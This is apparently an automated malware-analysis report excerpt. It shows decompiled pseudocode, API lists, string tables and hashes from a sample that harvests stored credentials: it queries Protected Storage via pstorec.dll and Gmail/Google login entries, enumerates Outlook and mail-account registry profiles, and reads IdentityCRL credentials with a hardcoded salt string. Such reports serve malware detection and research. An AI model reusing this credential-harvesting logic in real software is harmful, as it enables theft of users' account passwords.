                                                                                                                                                                  0x0040bdc0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040bd5c
                                                                                                                                                                  0x0040bd54
                                                                                                                                                                  0x0040bca1
                                                                                                                                                                  0x0040bca6
                                                                                                                                                                  0x0040bca8
                                                                                                                                                                  0x0040bce7
                                                                                                                                                                  0x0040bce7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040bce7
                                                                                                                                                                  0x0040bcaa
                                                                                                                                                                  0x0040bcb1
                                                                                                                                                                  0x0040bcb9
                                                                                                                                                                  0x0040bcbe
                                                                                                                                                                  0x0040bcc7
                                                                                                                                                                  0x0040bcd4
                                                                                                                                                                  0x0040bcda
                                                                                                                                                                  0x0040bcda
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040bcc7
                                                                                                                                                                  0x0040bc85
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040bc85
                                                                                                                                                                  0x0040bc45
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040bc0d
                                                                                                                                                                  0x0040bc0d
                                                                                                                                                                  0x0040bc17
                                                                                                                                                                  0x0040bdca
                                                                                                                                                                  0x0040bdca
                                                                                                                                                                  0x0040bdd1
                                                                                                                                                                  0x0040bdd9
                                                                                                                                                                  0x0040bdde
                                                                                                                                                                  0x0040bde6
                                                                                                                                                                  0x0040bdef
                                                                                                                                                                  0x0040bdf5
                                                                                                                                                                  0x0040bdf5
                                                                                                                                                                  0x0040bdfc
                                                                                                                                                                  0x0040be00
                                                                                                                                                                  0x0040be08
                                                                                                                                                                  0x0040be11
                                                                                                                                                                  0x0040be1a
                                                                                                                                                                  0x0040be1f
                                                                                                                                                                  0x0040be1f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040be1f
                                                                                                                                                                  0x0040bbad
                                                                                                                                                                  0x0040bbad
                                                                                                                                                                  0x0040be21
                                                                                                                                                                  0x0040be27
                                                                                                                                                                  0x0040be27

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00404841: LoadLibraryA.KERNEL32(comctl32.dll,76D24DE0,?,00000000,?,?,?,0040BBA9,76D24DE0), ref: 00404860
                                                                                                                                                                    • Part of subcall function 00404841: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404872
                                                                                                                                                                    • Part of subcall function 00404841: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040BBA9,76D24DE0), ref: 00404886
                                                                                                                                                                    • Part of subcall function 00404841: MessageBoxA.USER32 ref: 004048B1
                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040BDD9
                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0040BDEF
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                                                                                  • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                                                                                  • API String ID: 745651260-375988210
                                                                                                                                                                  • Opcode ID: e1159f30e00c98f05f2d67921a14677ae0d548148ce7ab1f7a7c6c893690e61f
                                                                                                                                                                  • Instruction ID: 8d811f0c9aed7e5f9a0d70865fafe098279c62815184764300974fb8b6b83255
                                                                                                                                                                  • Opcode Fuzzy Hash: e1159f30e00c98f05f2d67921a14677ae0d548148ce7ab1f7a7c6c893690e61f
                                                                                                                                                                  • Instruction Fuzzy Hash: A8618C71508345ABC720AFA1DC49A9BBBF9FF84705F00483FF545A22A0DB789904CB5E
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00403C17, Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184librarystringloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 67%
                                                                                                                                                                  			E00403C17(signed int __ecx, void* __eflags, void* __fp0) {
				char _v8;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t42;
				void* _t56;
				void* _t58;
				void* _t60;
				void* _t62;
				void* _t64;
				void* _t66;
				char* _t79;
				void* _t82;
				_Unknown_base(*)()* _t93;
				void* _t94;
				void* _t96;
				void* _t104;
				signed int _t106;
				char* _t114;
				_Unknown_base(*)()* _t130;
				void* _t142;

				_t142 = __fp0;
				_t98 = __ecx;
				_push(__ecx);
				_t106 = __ecx;
				_t96 = __ecx + 0x87c;
				 *(_t96 + 0xc) =  *(_t96 + 0xc) & 0x00000000;
				E0040EF05(_t96);
				_t42 = LoadLibraryA("pstorec.dll"); // executed
				 *(_t96 + 8) = _t42;
				if(_t42 == 0) {
					L4:
					E0040EF05(_t96);
				} else {
					_t93 = GetProcAddress(_t42, "PStoreCreateInstance");
					_t130 = _t93;
					_t98 = 0 | _t130 != 0x00000000;
					 *(_t96 + 0x10) = _t93;
					if(_t130 != 0) {
						goto L4;
					} else {
						_t98 = _t96 + 4;
						_t94 =  *_t93(_t96 + 4, 0, 0, 0);
						_t132 = _t94;
						if(_t94 != 0) {
							goto L4;
						} else {
							 *(_t96 + 0xc) = 1;
						}
					}
				}
				E004047AA(_t106 + 0x890, _t132);
				E004036A6(_t98, _t106, _t106 + 0x890, _t142, L"www.google.com/Please log in to your Gmail account");
				E004036A6(_t98, _t106, _t106 + 0x890, _t142, L"www.google.com:443/Please log in to your Gmail account");
				E004036A6(_t98, _t106, _t106 + 0x890, _t142, L"www.google.com/Please log in to your Google Account");
				E004036A6(_t98, _t106, _t106 + 0x890, _t142, L"www.google.com:443/Please log in to your Google Account");
				_push(_t106 + 0x858); // executed
				E004076B7(_t98, _t132); // executed
				E00407306(_t98, _t106 + 0x86c); // executed
				E004077C5(_t132, _t106 + 0x878); // executed
				_t56 = E0040F1B0(0x80000001, "Software\\Microsoft\\Internet Account Manager\\Accounts",  &_v8);
				_t133 = _t56;
				if(_t56 == 0) {
					E00402B92(_t98,  &_v8, _t133, _t142, _t106, 1);
				}
				_t58 = E0040F1B0(0x80000001, "Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts",  &_v8);
				_t134 = _t58;
				if(_t58 == 0) {
					E00402B92(_t98,  &_v8, _t134, _t142, _t106, 5);
				}
				E00402C1E(_t98, _t142, _t106); // executed
				 *((intOrPtr*)(_t106 + 0xb1c)) = 6;
				_t60 = E00406282();
				_push( &_v8);
				if( *((intOrPtr*)(_t60 + 0x10)) != 1) {
					_push("Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles");
				} else {
					_push("Software\\Microsoft\\Windows Messaging Subsystem\\Profiles");
				}
				_push(0x80000001);
				_t62 = E0040F1B0();
				_t136 = _t62;
				if(_t62 != 0) {
					 *((char*)(_t106 + 0xa9c)) = 0;
				} else {
					E00402AE3( &_v8, _t136, _t142, _t106);
				}
				 *((intOrPtr*)(_t106 + 0xb1c)) = 0xf;
				_t64 = E0040F1B0(0x80000001, "Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles",  &_v8);
				_t137 = _t64;
				if(_t64 != 0) {
					 *((char*)(_t106 + 0xa9c)) = 0;
				} else {
					E00402AE3( &_v8, _t137, _t142, _t106);
				}
				 *((intOrPtr*)(_t106 + 0xb1c)) = 0x10;
				_t66 = E0040F1B0(0x80000001, "Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles",  &_v8);
				_t138 = _t66;
				if(_t66 != 0) {
					 *((char*)(_t106 + 0xa9c)) = 0;
				} else {
					E00402AE3( &_v8, _t138, _t142, _t106);
				}
				E0040EF1C(_t96);
				E004047FB(_t106 + 0x890);
				E00402F9C(_t106, _t98, _t142, 0x80000001); // executed
				E00402F9C(_t106, _t98, _t142, 0x80000002); // executed
				E00403278(_t142, _t106);
				E004034A5(_t98, _t138, _t142, _t106); // executed
				E00403946(_t138, _t142, _t106); // executed
				E0040378B(_t98, _t106, _t142, _t106); // executed
				_t79 = _t106 + 0xb20;
				_t139 =  *_t79;
				if( *_t79 != 0) {
					 *((intOrPtr*)(_t106 + 0xf34)) = 0xa;
					E0040D9D8(_t106 + 0x1c8, _t104, _t139, _t79, 0);
				}
				_t114 = _t106 + 0xc25;
				_t140 =  *_t114;
				if( *_t114 != 0) {
					strcpy(_t106 + 0x52a, _t106 + 0xe2f);
					 *((intOrPtr*)(_t106 + 0xf34)) = 0xb;
					E0040D9D8(_t106 + 0x1c8, _t104, _t140, _t114, 0);
				}
				_push(_t106 + 0x640); // executed
				E0040E057(_t140); // executed
				E0040DEC3(_t106 + 0x640);
				_t82 = E004113C4(_t106 + 0x870, _t106 + 0x870); // executed
				return _t82;
			}























                                                                                                                                                                  0x00403c17
                                                                                                                                                                  0x00403c17
                                                                                                                                                                  0x00403c1a
                                                                                                                                                                  0x00403c1e
                                                                                                                                                                  0x00403c20
                                                                                                                                                                  0x00403c26
                                                                                                                                                                  0x00403c2c
                                                                                                                                                                  0x00403c36
                                                                                                                                                                  0x00403c40
                                                                                                                                                                  0x00403c43
                                                                                                                                                                  0x00403c75
                                                                                                                                                                  0x00403c77
                                                                                                                                                                  0x00403c45
                                                                                                                                                                  0x00403c4b
                                                                                                                                                                  0x00403c53
                                                                                                                                                                  0x00403c55
                                                                                                                                                                  0x00403c58
                                                                                                                                                                  0x00403c5d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00403c5f
                                                                                                                                                                  0x00403c62
                                                                                                                                                                  0x00403c66
                                                                                                                                                                  0x00403c68
                                                                                                                                                                  0x00403c6a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00403c6c
                                                                                                                                                                  0x00403c6c
                                                                                                                                                                  0x00403c6c
                                                                                                                                                                  0x00403c6a
                                                                                                                                                                  0x00403c5d
                                                                                                                                                                  0x00403c82
                                                                                                                                                                  0x00403c8c
                                                                                                                                                                  0x00403c96
                                                                                                                                                                  0x00403ca0
                                                                                                                                                                  0x00403caa
                                                                                                                                                                  0x00403cb5
                                                                                                                                                                  0x00403cb6
                                                                                                                                                                  0x00403cc2
                                                                                                                                                                  0x00403cce
                                                                                                                                                                  0x00403ce1
                                                                                                                                                                  0x00403ce9
                                                                                                                                                                  0x00403ceb
                                                                                                                                                                  0x00403cf3
                                                                                                                                                                  0x00403cf3
                                                                                                                                                                  0x00403d06
                                                                                                                                                                  0x00403d0e
                                                                                                                                                                  0x00403d10
                                                                                                                                                                  0x00403d18
                                                                                                                                                                  0x00403d18
                                                                                                                                                                  0x00403d1e
                                                                                                                                                                  0x00403d23
                                                                                                                                                                  0x00403d2d
                                                                                                                                                                  0x00403d39
                                                                                                                                                                  0x00403d3a
                                                                                                                                                                  0x00403d43
                                                                                                                                                                  0x00403d3c
                                                                                                                                                                  0x00403d3c
                                                                                                                                                                  0x00403d3c
                                                                                                                                                                  0x00403d48
                                                                                                                                                                  0x00403d4d
                                                                                                                                                                  0x00403d55
                                                                                                                                                                  0x00403d57
                                                                                                                                                                  0x00403d64
                                                                                                                                                                  0x00403d59
                                                                                                                                                                  0x00403d5d
                                                                                                                                                                  0x00403d5d
                                                                                                                                                                  0x00403d79
                                                                                                                                                                  0x00403d83
                                                                                                                                                                  0x00403d8b
                                                                                                                                                                  0x00403d8d
                                                                                                                                                                  0x00403d9a
                                                                                                                                                                  0x00403d8f
                                                                                                                                                                  0x00403d93
                                                                                                                                                                  0x00403d93
                                                                                                                                                                  0x00403daf
                                                                                                                                                                  0x00403db9
                                                                                                                                                                  0x00403dc1
                                                                                                                                                                  0x00403dc3
                                                                                                                                                                  0x00403dd0
                                                                                                                                                                  0x00403dc5
                                                                                                                                                                  0x00403dc9
                                                                                                                                                                  0x00403dc9
                                                                                                                                                                  0x00403dd9
                                                                                                                                                                  0x00403de4
                                                                                                                                                                  0x00403df0
                                                                                                                                                                  0x00403dfc
                                                                                                                                                                  0x00403e02
                                                                                                                                                                  0x00403e08
                                                                                                                                                                  0x00403e0e
                                                                                                                                                                  0x00403e14
                                                                                                                                                                  0x00403e19
                                                                                                                                                                  0x00403e1f
                                                                                                                                                                  0x00403e22
                                                                                                                                                                  0x00403e2d
                                                                                                                                                                  0x00403e37
                                                                                                                                                                  0x00403e37
                                                                                                                                                                  0x00403e3c
                                                                                                                                                                  0x00403e42
                                                                                                                                                                  0x00403e45
                                                                                                                                                                  0x00403e55
                                                                                                                                                                  0x00403e65
                                                                                                                                                                  0x00403e6f
                                                                                                                                                                  0x00403e6f
                                                                                                                                                                  0x00403e7a
                                                                                                                                                                  0x00403e7b
                                                                                                                                                                  0x00403e81
                                                                                                                                                                  0x00403e8d
                                                                                                                                                                  0x00403e96

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040EF05: FreeLibrary.KERNELBASE(?,0040EF39,?,?,?,?,?,?,00404221), ref: 0040EF11
                                                                                                                                                                  • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C36
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4B
                                                                                                                                                                  • strcpy.MSVCRT(?,?), ref: 00403E55
                                                                                                                                                                  Strings
                                                                                                                                                                  • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C91
                                                                                                                                                                  • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6F
                                                                                                                                                                  • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA5
                                                                                                                                                                  • www.google.com/Please log in to your Google Account, xrefs: 00403C9B
                                                                                                                                                                  • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFC
                                                                                                                                                                  • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD7
                                                                                                                                                                  • pstorec.dll, xrefs: 00403C31
                                                                                                                                                                  • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D43
                                                                                                                                                                  • www.google.com/Please log in to your Gmail account, xrefs: 00403C87
                                                                                                                                                                  • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA5
                                                                                                                                                                  • PStoreCreateInstance, xrefs: 00403C45
                                                                                                                                                                  • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Library$AddressFreeLoadProcstrcpy
                                                                                                                                                                  • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                                                                                  • API String ID: 2884822230-317895162
                                                                                                                                                                  • Opcode ID: edd8b6eb8bcfee5f27bfe3d894378078f305261ef97242b4e9c725312b665777
                                                                                                                                                                  • Instruction ID: c79aa312a60a802310c0dbcdda9968b0b76b201639e98401828b305836cf62c0
                                                                                                                                                                  • Opcode Fuzzy Hash: edd8b6eb8bcfee5f27bfe3d894378078f305261ef97242b4e9c725312b665777
                                                                                                                                                                  • Instruction Fuzzy Hash: BE51C472604601BAD710AF72CC46FDABA6CAF01709F14017FF905B61C2EB7DAB548A99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040E057, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 101registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                                                  			E0040E057(void* __eflags, void* _a4, int _a8, int _a12, void* _a16, char _a20, void* _a24, int _a28, void* _a32, int _a36, void _a40, void _a104) {
				void* _v0;
				void* __esi;
				long _t34;
				long _t36;
				long _t40;
				void* _t64;
				void* _t68;
				int _t73;

				E00412360(0x102c, _t64);
				_t34 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\IdentityCRL", 0, 0x20019,  &_v0); // executed
				if(_t34 != 0) {
					L10:
					return _t34;
				}
				_t36 = RegOpenKeyExA(_v0, "Dynamic Salt", 0, 0x20019,  &_a4); // executed
				if(_t36 != 0) {
					L9:
					_t34 = RegCloseKey(_v0); // executed
					goto L10;
				}
				_a8 = 0x1000;
				_t40 = RegQueryValueExA(_a4, "Value", 0,  &_a36,  &_a40,  &_a8);
				_t81 = _t40;
				if(_t40 == 0) {
					_t63 = _a4 + 0xc;
					if(E004047AA(_a4 + 0xc, _t81) != 0) {
						_a20 = _a8;
						_a24 =  &_a40;
						_t73 = 0x40;
						_t68 = L"%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd";
						_a28 = _t73;
						_a32 = _t68;
						if(E0040481B(_t63,  &_a20,  &_a28,  &_a12) != 0) {
							if(_a12 < 0x400) {
								memcpy( &_a40, _t68, _t73);
								memcpy( &_a104, _a16, _a12);
								E0040DD59(_t64, _a12 + _t73, _a4,  &_a40, _a12 + _t73, _v0);
							}
							LocalFree(_a16);
						}
					}
				}
				RegCloseKey(_a4);
				goto L9;
			}











                                                                                                                                                                  0x0040e062
                                                                                                                                                                  0x0040e088
                                                                                                                                                                  0x0040e08c
                                                                                                                                                                  0x0040e18e
                                                                                                                                                                  0x0040e194
                                                                                                                                                                  0x0040e194
                                                                                                                                                                  0x0040e0a2
                                                                                                                                                                  0x0040e0a6
                                                                                                                                                                  0x0040e184
                                                                                                                                                                  0x0040e188
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040e188
                                                                                                                                                                  0x0040e0c5
                                                                                                                                                                  0x0040e0cd
                                                                                                                                                                  0x0040e0d3
                                                                                                                                                                  0x0040e0d5
                                                                                                                                                                  0x0040e0de
                                                                                                                                                                  0x0040e0ea
                                                                                                                                                                  0x0040e0f4
                                                                                                                                                                  0x0040e0fe
                                                                                                                                                                  0x0040e102
                                                                                                                                                                  0x0040e112
                                                                                                                                                                  0x0040e119
                                                                                                                                                                  0x0040e11d
                                                                                                                                                                  0x0040e128
                                                                                                                                                                  0x0040e132
                                                                                                                                                                  0x0040e13b
                                                                                                                                                                  0x0040e150
                                                                                                                                                                  0x0040e16b
                                                                                                                                                                  0x0040e16b
                                                                                                                                                                  0x0040e174
                                                                                                                                                                  0x0040e174
                                                                                                                                                                  0x0040e128
                                                                                                                                                                  0x0040e0ea
                                                                                                                                                                  0x0040e17e
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E80,?), ref: 0040E088
                                                                                                                                                                  • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E80,?), ref: 0040E0A2
                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E80,?), ref: 0040E0CD
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E80,?), ref: 0040E17E
                                                                                                                                                                    • Part of subcall function 004047AA: LoadLibraryA.KERNELBASE(?,0040DC6C,80000001,7479F420), ref: 004047B2
                                                                                                                                                                    • Part of subcall function 004047AA: GetProcAddress.KERNEL32(00000000,?), ref: 004047CA
                                                                                                                                                                  • memcpy.MSVCRT ref: 0040E13B
                                                                                                                                                                  • memcpy.MSVCRT ref: 0040E150
                                                                                                                                                                    • Part of subcall function 0040DD59: RegOpenKeyExA.ADVAPI32(p@,Creds,00000000,00020019,p@,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040E170,?,?,?,?), ref: 0040DD83
                                                                                                                                                                    • Part of subcall function 0040DD59: memset.MSVCRT ref: 0040DDA1
                                                                                                                                                                    • Part of subcall function 0040DD59: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040DEA5
                                                                                                                                                                    • Part of subcall function 0040DD59: RegCloseKey.ADVAPI32(?), ref: 0040DEB6
                                                                                                                                                                  • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E80,?), ref: 0040E174
                                                                                                                                                                  • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E80,?), ref: 0040E188
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                                                                                  • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                                                                                                  • API String ID: 2768085393-1693574875
                                                                                                                                                                  • Opcode ID: 7df82dd4f7763ce5193550669c390a20838b5133b5989fa9b4096a2fc0febe08
                                                                                                                                                                  • Instruction ID: a1b69f5673053fc040be98c60ebfc88e8990dfc0172556f981ec686efddd513d
                                                                                                                                                                  • Opcode Fuzzy Hash: 7df82dd4f7763ce5193550669c390a20838b5133b5989fa9b4096a2fc0febe08
                                                                                                                                                                  • Instruction Fuzzy Hash: 99313CB2504305AFD700DF51DC40E9BBBECEF88798F00493AFA94E2160D775DA598B6A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0041211A, Relevance: 18.1, APIs: 12, Instructions: 128COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                                  			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t33;
				intOrPtr* _t35;
				intOrPtr* _t36;
				void* _t39;
				void _t41;
				intOrPtr _t48;
				signed int _t50;
				int _t52;
				intOrPtr _t55;
				signed int _t56;
				signed int _t57;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr* _t65;
				intOrPtr* _t69;
				int _t70;
				void* _t71;
				intOrPtr _t79;

				_push(0x70);
				_push(0x4133e0);
				E00412308(__ebx, __edi, __esi);
				_t33 = GetModuleHandleA(0);
				if(_t33->i != 0x5a4d) {
					L4:
					 *(_t71 - 0x1c) = 0;
				} else {
					_t65 =  *((intOrPtr*)(_t33 + 0x3c)) + _t33;
					if( *_t65 != 0x4550) {
						goto L4;
					} else {
						_t56 =  *(_t65 + 0x18) & 0x0000ffff;
						if(_t56 == 0x10b) {
							__eflags =  *((intOrPtr*)(_t65 + 0x74)) - 0xe;
							if( *((intOrPtr*)(_t65 + 0x74)) <= 0xe) {
								goto L4;
							} else {
								_t57 = 0;
								__eflags =  *(_t65 + 0xe8);
								goto L9;
							}
						} else {
							if(_t56 == 0x20b) {
								__eflags =  *((intOrPtr*)(_t65 + 0x84)) - 0xe;
								if( *((intOrPtr*)(_t65 + 0x84)) <= 0xe) {
									goto L4;
								} else {
									_t57 = 0;
									__eflags =  *(_t65 + 0xf8);
									L9:
									_t9 = __eflags != 0;
									__eflags = _t9;
									 *(_t71 - 0x1c) = _t57 & 0xffffff00 | _t9;
								}
							} else {
								goto L4;
							}
						}
					}
				}
				 *(_t71 - 4) = 0;
				__set_app_type(2);
				 *0x418b6c =  *0x418b6c | 0xffffffff;
				 *0x418b70 =  *0x418b70 | 0xffffffff;
				_t35 = __p__fmode();
				_t62 =  *0x417b8c; // 0x0
				 *_t35 = _t62;
				_t36 = __p__commode();
				_t63 =  *0x417b88; // 0x0
				 *_t36 = _t63;
				 *0x418b68 =  *_adjust_fdiv;
				_t39 = E00412304();
				_t79 =  *0x417000; // 0x1
				if(_t79 == 0) {
					__setusermatherr(E00412304);
					_pop(_t63);
				}
				E004122F2(_t39);
				_push(0x4133b4);
				_push(0x4133b0);
				L004122EC();
				_t41 =  *0x417b84; // 0x0
				 *(_t71 - 0x20) = _t41;
				 *(_t71 - 0x30) = __getmainargs(_t71 - 0x2c, _t71 - 0x28, _t71 - 0x24,  *0x417b80, _t71 - 0x20);
				_push(0x4133ac);
				_push(0x413398); // executed
				L004122EC(); // executed
				_t69 =  *_acmdln;
				 *((intOrPtr*)(_t71 - 0x34)) = _t69;
				if( *_t69 != 0x22) {
					while(1) {
						__eflags =  *_t69 - 0x20;
						if(__eflags <= 0) {
							goto L17;
						}
						_t69 = _t69 + 1;
						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
					}
				} else {
					do {
						_t69 = _t69 + 1;
						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
						_t55 =  *_t69;
					} while (_t55 != 0 && _t55 != 0x22);
					if( *_t69 == 0x22) {
						L16:
						_t69 = _t69 + 1;
						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
					}
				}
				L17:
				_t48 =  *_t69;
				if(_t48 != 0 && _t48 <= 0x20) {
					goto L16;
				}
				 *(_t71 - 0x4c) = 0;
				GetStartupInfoA(_t71 - 0x78);
				_t87 =  *(_t71 - 0x4c) & 0x00000001;
				if(( *(_t71 - 0x4c) & 0x00000001) == 0) {
					_t50 = 0xa;
				} else {
					_t50 =  *(_t71 - 0x48) & 0x0000ffff;
				}
				_t52 = E0040BB8D(_t63, _t87, GetModuleHandleA(0), 0, _t69, _t50); // executed
				_t70 = _t52;
				 *(_t71 - 0x7c) = _t70;
				if( *(_t71 - 0x1c) == 0) {
					exit(_t70); // executed
				}
				__imp___cexit();
				 *(_t71 - 4) =  *(_t71 - 4) | 0xffffffff;
				return E00412341(_t70);
			}





















                                                                                                                                                                  0x0041211a
                                                                                                                                                                  0x0041211c
                                                                                                                                                                  0x00412121
                                                                                                                                                                  0x0041212f
                                                                                                                                                                  0x00412136
                                                                                                                                                                  0x00412157
                                                                                                                                                                  0x00412157
                                                                                                                                                                  0x00412138
                                                                                                                                                                  0x0041213b
                                                                                                                                                                  0x00412143
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00412145
                                                                                                                                                                  0x00412145
                                                                                                                                                                  0x0041214e
                                                                                                                                                                  0x0041216f
                                                                                                                                                                  0x00412173
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00412175
                                                                                                                                                                  0x00412175
                                                                                                                                                                  0x00412177
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00412177
                                                                                                                                                                  0x00412150
                                                                                                                                                                  0x00412155
                                                                                                                                                                  0x0041215c
                                                                                                                                                                  0x00412163
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00412165
                                                                                                                                                                  0x00412165
                                                                                                                                                                  0x00412167
                                                                                                                                                                  0x0041217d
                                                                                                                                                                  0x0041217d
                                                                                                                                                                  0x0041217d
                                                                                                                                                                  0x00412180
                                                                                                                                                                  0x00412180
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00412155
                                                                                                                                                                  0x0041214e
                                                                                                                                                                  0x00412143
                                                                                                                                                                  0x00412183
                                                                                                                                                                  0x00412188
                                                                                                                                                                  0x0041218f
                                                                                                                                                                  0x00412196
                                                                                                                                                                  0x0041219d
                                                                                                                                                                  0x004121a3
                                                                                                                                                                  0x004121a9
                                                                                                                                                                  0x004121ab
                                                                                                                                                                  0x004121b1
                                                                                                                                                                  0x004121b7
                                                                                                                                                                  0x004121c0
                                                                                                                                                                  0x004121c5
                                                                                                                                                                  0x004121ca
                                                                                                                                                                  0x004121d0
                                                                                                                                                                  0x004121d7
                                                                                                                                                                  0x004121dd
                                                                                                                                                                  0x004121dd
                                                                                                                                                                  0x004121de
                                                                                                                                                                  0x004121e3
                                                                                                                                                                  0x004121e8
                                                                                                                                                                  0x004121ed
                                                                                                                                                                  0x004121f2
                                                                                                                                                                  0x004121f7
                                                                                                                                                                  0x00412216
                                                                                                                                                                  0x00412219
                                                                                                                                                                  0x0041221e
                                                                                                                                                                  0x00412223
                                                                                                                                                                  0x00412230
                                                                                                                                                                  0x00412232
                                                                                                                                                                  0x00412238
                                                                                                                                                                  0x00412274
                                                                                                                                                                  0x00412274
                                                                                                                                                                  0x00412277
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00412279
                                                                                                                                                                  0x0041227a
                                                                                                                                                                  0x0041227a
                                                                                                                                                                  0x0041223a
                                                                                                                                                                  0x0041223a
                                                                                                                                                                  0x0041223a
                                                                                                                                                                  0x0041223b
                                                                                                                                                                  0x0041223e
                                                                                                                                                                  0x00412240
                                                                                                                                                                  0x0041224b
                                                                                                                                                                  0x0041224d
                                                                                                                                                                  0x0041224d
                                                                                                                                                                  0x0041224e
                                                                                                                                                                  0x0041224e
                                                                                                                                                                  0x0041224b
                                                                                                                                                                  0x00412251
                                                                                                                                                                  0x00412251
                                                                                                                                                                  0x00412255
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041225b
                                                                                                                                                                  0x00412262
                                                                                                                                                                  0x00412268
                                                                                                                                                                  0x0041226c
